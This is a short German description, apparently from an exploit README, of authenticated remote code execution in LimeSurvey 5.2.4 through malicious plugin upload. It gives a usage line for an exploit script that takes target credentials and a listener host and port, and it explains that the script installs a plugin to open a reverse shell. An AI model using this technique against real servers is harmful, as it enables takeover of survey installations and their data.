
Authentifizierte (privilegierte) Remote-Befehlsausführung in LimeSurvey Version 5.2.4 über das Hochladen und Installieren von Plugins ermöglicht es einem entfernten Benutzer, eine beliebige PHP-Code-Datei hochzuladen.
Authentifizierte (privilegierte) Remote-Befehlsausführung in LimeSurvey Version 5.2.4 durch Hochladen und Installieren von Plugins erlaubt einem Remote-Benutzer das Hochladen beliebiger PHP-Code-Dateien.
python3 exploit.py --url <http://example.com> --user <userName> --password <userPassword> --lhost <localHost> --lport <localPort>
Ein Superadmin-Benutzer darf Plugin-Module über das LimeSurvey-Administrationspanel laden. Das Skript erstellt lokal die Dateien, packt sie und lädt sie hoch. Später wird ein Aufruf zum Installieren, Aktivieren und Ausführen der Module getätigt, um die Reverse-Shell auszuführen.
